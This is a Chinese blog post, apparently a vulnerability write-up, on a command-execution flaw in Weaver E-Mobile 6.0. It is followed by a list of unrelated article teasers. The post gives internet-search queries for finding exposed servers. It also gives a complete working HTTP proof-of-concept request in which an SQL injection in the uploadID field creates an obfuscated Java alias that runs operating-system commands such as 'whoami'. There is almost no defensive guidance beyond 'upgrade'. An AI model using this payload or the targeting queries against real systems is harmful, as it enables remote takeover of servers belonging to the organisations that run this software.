泛微E-Mobile 6.0命令执行漏洞
声明
本文仅用于技术交流,请勿用于非法用途
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。
一、漏洞原理
泛微E-Mobile 6.0存在命令执行漏洞的问题,在某些情况下,用户的输入可能被直接传递给底层操作系统的命令执行函数,攻击者可以通过在输入中插入特殊字符或命令序列来欺骗应用程序将其作为有效命令来执行,从而获得服务器的命令执行权限。
二、网络空间测绘
fofa
"Weaver E-Mobile"
Hunter
web.body=Weaver E-Mobile
三、poc
POST /client.do HTTP/1.1
Host: xxx.xxx.xxx.xxx
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryTm8YXcJeyKDClbU7
Content-Length: 1147------WebKitFormBoundaryTm8YXcJeyKDClbU7
Content-Disposition: form-data; name="method"getupload
------WebKitFormBoundaryTm8YXcJeyKDClbU7
Content-Disposition: form-data; name="uploadID"1';CREATE ALIAS if not exists MzSNqKsZTagmf AS CONCAT('void e(String cmd) throws java.la','ng.Exception{','Object curren','tRequest = Thre','ad.currentT','hread().getConte','xtClass','Loader().loadC','lass("com.caucho.server.dispatch.ServletInvocation").getMet','hod("getContextRequest").inv','oke(null);java.la','ng.reflect.Field _responseF = currentRequest.getCl','ass().getSuperc','lass().getDeclar','edField("_response");_responseF.setAcce','ssible(true);Object response = _responseF.get(currentRequest);java.la','ng.reflect.Method getWriterM = response.getCl','ass().getMethod("getWriter");java.i','o.Writer writer = (java.i','o.Writer)getWriterM.inv','oke(response);java.ut','il.Scan','ner scan','ner = (new java.util.Scann','er(Runt','ime.getRunt','ime().ex','ec(cmd).getInput','Stream())).useDelimiter("\\A");writer.write(scan','ner.hasNext()?sca','nner.next():"");}');CALL MzSNqKsZTagmf('whoami');--
------WebKitFormBoundaryTm8YXcJeyKDClbU7--四、漏洞复现
先见一下面,访问漏洞环境
burp抓包,放poc,拿下
五、修复建议
升级版本,低版本漏洞太多了
泛微e-office体验服务中心_泛微移动办公OA系统标准版_中小组织办公数字化产品
相关文章:
泛微E-Mobile 6.0命令执行漏洞
声明 本文仅用于技术交流,请勿用于非法用途 由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。 一、漏洞原理 泛微E-Mobile 6.0存在命令执行漏洞的问题,在…...
React 共享组件状态及其实践
React 是一个强大的JavaScript库,它提供了一种简单的方式来构建用户界面。然而,随着应用规模的增长,状态管理成为一个复杂的问题。本篇文章将深入探讨如何在React组件之间共享状态。 状态提升 首先,我们来谈谈"状态提升&qu…...
linux目录说明
我一般会在/opt目录下创建 一个software目录,用来存放我们从官网下载的软件格式是.tar.gz文件,或者通过 wget地址下载的.tar.gz文件 执行解压缩命令,这里以nginx举例 tar -zxvf nginx-1.16.0.tar.gz -C /usr/local/src/ 把源码解压到/usr/loc…...
成集云 | 英克对接零售O2O+线上商城 | 解决方案
方案介绍 零售O2O线上商城是一种新型的商业模式,它通过线上和线下的融合,提供更加便捷的购物体验。其中,O2O指的是线上与线下的结合,通过互联网平台与实体店面的结合,实现线上线下的互动和协同。线上商城则是指通过互…...
java传base64返回给数据报404踩坑
一、问题复现 1.可能因为base64字符太长,导致后端处理时出错,表现为前端请求报400错误; 这一步debug进去发现base64数据是正常传值的 所以排除掉不是后端问题,但是看了下前端请求,猜测可能是转换base64时间太长数据过大导致的404 2.前端传…...
【Delphi】Android 开发HTTP请求出错解决方案
目录 一、故障现象 二、原因及解决方案 一、故障现象 在android内建的WebBrowser浏览器中通过http访问一个网站(注意不是https),出现如下错误提示: 在使用ntfy的时候,访问http定义的服务器地址(注意不是…...
Kafka中遇到的错误:
1、原因:kafka是一个去中心化结果的,所以在启动Kafka的时候,每一个节点上都需要启动。 启动的命令:kafka-server-start.sh -daemon /usr/local/soft/kafka_2.11-1.0.0/config/server.properties...
线程安全(JAVA)
线程安全对于我们编写多线程代码是非常重要的。 什么是线程安全? 在我们平时的代码中有些代码在单线程程序中可以正常执行,但如果同样的代码放在在多个线程中执行就会引发BUG,而这种现象我们一般称为 “线程安全问题” 或 “线程不安全”。…...
Lightroom Classic 2021 v10.4
Lightroom Classic 2021是一款一体化照片管理和编辑解决方案。 它面向专业人士和高端用户,支持各种不同相机的原始图像编辑,包括Canon、Apple、Casio、Contax、DxO、Epson等品牌。这样可以将原图像快速导入进行编辑,轻松满足不同用户的需求。…...
Java面试题03
1.Java容器都有哪些 Java提供了丰富的容器类,包括Collection接口的实现类(如List、Set等)和Map接口的实现类(如HashMap、TreeMap等),它们分别用于存储不同类型的元素和键值对。 Java容器主要分为两种类型&a…...
【操作系统】测试二
文章目录 单选题判断题填空题 单选题 在操作系统中,进行资源分配、调度和管理的最小独立单位是()。 【 正确答案: C】 A. 作业 B. 程序 C. 进程 D. 用户 进程在发出I/O请求后,可能导致下列哪种进程状态演变? 【 正确答…...
大厂面试题-索引有哪些缺点以及具体有哪些索引类型
第一个,索引的优缺点 优点: 1、合理的增加索引 ,可以提高数据查询的效率 ,减少查询时间 2、有一些特殊的索引 ,可以保证数据的完整性 ,比如唯一索引 缺点: 1、创建索引和维护索引需要消耗时间…...
Vue真实技术面试题解析【兄弟组件、vue-router、增量部署】
兄弟组件的传值方式,有两种方式,把你尽可能知道的告诉我 我的答案:使用父组件传值 和 状态管理传值 使用事件总线(Event Bus):创建一个空的 Vue 实例作为事件总线,在其中定义事件和对应的处理函…...
响应式生活常识新闻博客资讯网站模板源码带后台
模板信息: 模板编号:30483 模板编码:UTF8 模板分类:博客、文章、资讯、其他 适合行业:博客类企业 模板介绍: 本模板自带eyoucms内核,无需再下载eyou系统,原创设计、手工书写DIVCSS&a…...
获取AAC音频的ADTS固定头部信息
文章目录 前言一、AAC音频中的ADTS二、解析ADTS信息1.标准文档中介绍2.解析3.采样率索引和值4.下载AAC标准文档 前言 调试嵌入式设备中播放aac音频的过程中,了解了aac音频格式,记录在此,防止遗忘。 一、AAC音频中的ADTS ADTS(Audi…...
二分查找--C++实现
1. 简介 满足有序性,每次排除一半的可能性。 2. 实现 2.1 手写 int bin_search(vector<int> &arr,int v) {int hi arr.size() - 1;int lo 0;while ( lo < hi){int mid (lo hi) >> 1;if (arr[mid] < v)lo mid 1;elsehi mid - 1;}re…...
计算机毕设 基于机器学习的文本聚类 - 可用于舆情分析
文章目录 0 简介1 项目介绍1.1 提取文本特征1.2 聚类算法选择 2 代码实现2.1 中文文本预处理2.2 特征提取2.2.1 Tf-idf2.2.2 word2vec 2.3 聚类算法2.3.1 k-means 2.3.2 DBSCAN2.4 实现效果2.4.1 tf-idf k-means聚类结果2.4.2 word2vec k-means 聚类结果 最后 0 简介 今天学…...
uniApp获取当前位置经纬度
以下是使用uni.getLocation获取当前位置的示例代码: 调用uni.getLocation方法获取当前位置信息 uni.getLocation({type: wgs84, // 坐标类型,默认为wgs84,可选的值为gcj02和bd09llsuccess: res > {// 获取成功,经度和纬度在r…...
this.$message提示内容添加换行
0 效果 1 代码 let msgArr [只允许上传doc/docx/xls/xlsx/pdf/png/jpg/bmp/ppt/pptx/rar/zip格式文件,且单个文件大小不能超过20MB,已过滤无效的文件] let msg msgArr.join(<br/>) this.$message({dangerouslyUseHTMLString: true,message: msg,type: warning })...
“三大阶段稳定性测试”筑牢长安链信任基石
前言 随着长安链应用生态的不断丰富、面对的应用场景更加多元,稳定性测试在长安链测试流程中占到越来越重要的位置。本文将介绍长安链稳定性测试的发展历程及如何通过三大阶段稳定性测试应对不断出现的复杂的商业需求,筑牢长安链信任基石。 功能测试和…...
3分钟解决C盘爆红问题:WindowsCleaner终极清理指南
3分钟解决C盘爆红问题:WindowsCleaner终极清理指南 【免费下载链接】WindowsCleaner Windows Cleaner——专治C盘爆红及各种不服! 项目地址: https://gitcode.com/gh_mirrors/wi/WindowsCleaner 还在为Windows系统越用越慢而烦恼吗?当…...
)
告别闪烁!优化ESP32+ST7789滚屏效果的3个关键技巧(SPI时序与双缓冲)
告别闪烁!优化ESP32ST7789滚屏效果的3个关键技巧 在嵌入式显示应用中,流畅的滚屏效果往往能显著提升用户体验。当开发者成功驱动ST7789屏幕并实现基础滚屏功能后,常会遇到画面撕裂、闪烁或滚动不流畅等问题。本文将深入探讨三个关键优化技巧&…...
机器人应用-地下车库清洁
传统地下车库清洁存在高度依赖人工、人力成本高、作业环境恶劣、作业质 量不稳定、夜间安全风险及管理不可量化等核心痛点。商用清洁机器人系统通过 “云端任务规划-机器人自主执行-数据闭环反馈”的全自动化流程,将传统依 赖于人的非标准化服…...
Vue项目里用UX-Grid处理表格排序,遇到百分比、null和‘--’占位符怎么办?
Vue项目中用UX-Grid处理复杂表格排序的实战指南 在数据可视化后台开发中,表格排序是最基础却最容易踩坑的功能之一。当你的数据里混着百分比字符串、null值和各种占位符时,UX-Grid默认的排序逻辑往往会给出令人困惑的结果。本文将带你解决这些实际开发中…...
一根同轴电缆的逆袭:SDI接口如何靠‘复用’老设备,成为专业视频传输的30年常青树?
一根同轴电缆的逆袭:SDI接口如何靠‘复用’老设备,成为专业视频传输的30年常青树? 在技术迭代日新月异的今天,很少有标准能像SDI接口这样,凭借一根75欧姆同轴电缆和BNC接头,在专业视频传输领域屹立30年不倒…...
原理与应用实战指南)
支持向量机(SVM)原理与应用实战指南
1. 支持向量机:机器学习中的"边界大师"第一次听说支持向量机(SVM)时,我正为一个医疗诊断项目焦头烂额。我们需要区分两种极易混淆的细胞类型,传统逻辑回归的准确率始终卡在82%左右。直到一位前辈建议:"试试SVM吧&a…...
L2-059 森林藏宝图 - java
L2-059 森林藏宝图 语言时间限制内存限制代码长度限制栈限制Java (javac)1200 ms512 MB16KB8192 KBPython (python3)500 ms256 MB16KB8192 KB其他编译器400 ms64 MB16KB8192 KB题目描述: 姥姥手里有一张森林藏宝图(别问怎么得到的)࿰…...
爬虫被封怕了?试试这几种动态代理IP的调度策略
做爬虫开发的小伙伴,估计都有过被“卡脖子”的崩溃瞬间:上一秒还在顺顺利利采集数据,下一秒请求就直接被拒,打开目标网站一看,好家伙——“IP已被封禁”,更坑的是,有时候连自己的真实IP都能被牵…...
Base64 编码解码全栈实践:从命令行到代码的跨平台解决方案
1. 为什么你需要掌握Base64全栈技能? 第一次接触Base64是在处理图片上传功能时。当时前端同事抱怨:"你这接口传的二进制数据怎么老是乱码?"后来才知道,原来HTTP协议传输二进制数据时需要先转成文本格式——这就是Base64…...
番茄小说下载器:终极免费解决方案,永久保存你喜爱的每一本小说
番茄小说下载器:终极免费解决方案,永久保存你喜爱的每一本小说 【免费下载链接】fanqienovel-downloader 下载番茄小说 项目地址: https://gitcode.com/gh_mirrors/fa/fanqienovel-downloader 还在担心心爱的小说突然下架?或者在地铁上…...